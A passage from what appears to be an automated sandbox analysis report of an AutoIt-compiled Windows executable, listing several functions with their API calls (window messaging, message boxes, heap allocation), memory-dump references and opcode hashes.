                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendwsprintf
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3751067900-328681919
                                                                                                                • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E
                                                                                                                Function 0041A2B3 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • HeapReAlloc.KERNEL32(00000000,-00000010,00000000,00000000,0041A813,00000000,?,00000000,00413979,?,?,00411739,?,00401C0B), ref: 0041A2DA
                                                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0041A813,00000000,?,00000000,00413979,?,?,00411739,?,00401C0B), ref: 0041A310
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00411739,?,00401C0B), ref: 0041A32A
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00411739,?,00401C0B), ref: 0041A341
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3499195154-0
                                                                                                                • Opcode ID: bc501b1f3452fb4555c1e7e86ad22a71cea65b8e1d754c6294030291da32ca1b
                                                                                                                • Instruction ID: c0789fce48f3efc00023f82bc826da5228bc21048a08359dcc1a9c3791e9814b
                                                                                                                • Opcode Fuzzy Hash: bc501b1f3452fb4555c1e7e86ad22a71cea65b8e1d754c6294030291da32ca1b
                                                                                                                • Instruction Fuzzy Hash: AD119131604200AFC7214F28ED059567BB5F7597207214A7AF9A6D72F1D3759C828B58